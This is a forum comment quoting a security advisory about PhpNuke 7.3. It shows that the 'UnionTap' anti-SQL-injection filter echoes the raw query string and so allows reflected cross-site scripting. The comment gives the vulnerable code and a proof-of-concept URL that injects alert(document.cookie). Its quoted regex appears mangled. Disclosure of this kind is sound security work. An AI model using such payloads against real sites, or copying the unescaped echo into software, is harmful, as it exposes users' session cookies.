|
|
|
|
- Readme First! - Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 280 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
| The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
No Comments Allowed for Anonymous, please register | | | | |
Re: Fortress™ Request for Comments (Score: 1) by inkydink1234 on Monday, May 17 @ 21:46:00 CEST (User Info | Send a Message) | From the Waraxe site:
B5 - XSS through nukecops UnionTap Sql Prevention Code:
Well, you know, this is my favourite one - securing one hole will induct new one.
Let's look at beginning of the "mainfile.php" from PhpNuke 7.3 :
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER["QUERY_STRING"]), $matches)) {
die("YOU ARE SLAPPED BY NUKECOPS [nukecops.com] BY USING '$matches[1]' INSIDE '$loc'.");
}
So this clever code will catch up nonmasked sql injection attempts, made through "GET" request...
Let's try this request:
http://localhost/nuke73/index.php?foo=bar%20union%20select
and we see nice message like this:
YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE 'foo=bar%20union%20select'.
Uh, how scary...
But what, if we issue request like this (try it with M$ Internet Explorer for succes!):
http://localhost/nuke73/index.php?foo=bar%20union%20select%20alert(document.cookie);
Oops, nice case of cross-site scripting! And because anti-xss filtering code is located
AFTER UnionTap, then we can use even most common "" tags...
Heya to nukecops and have a nice day
|
| Parent | | | | | |
|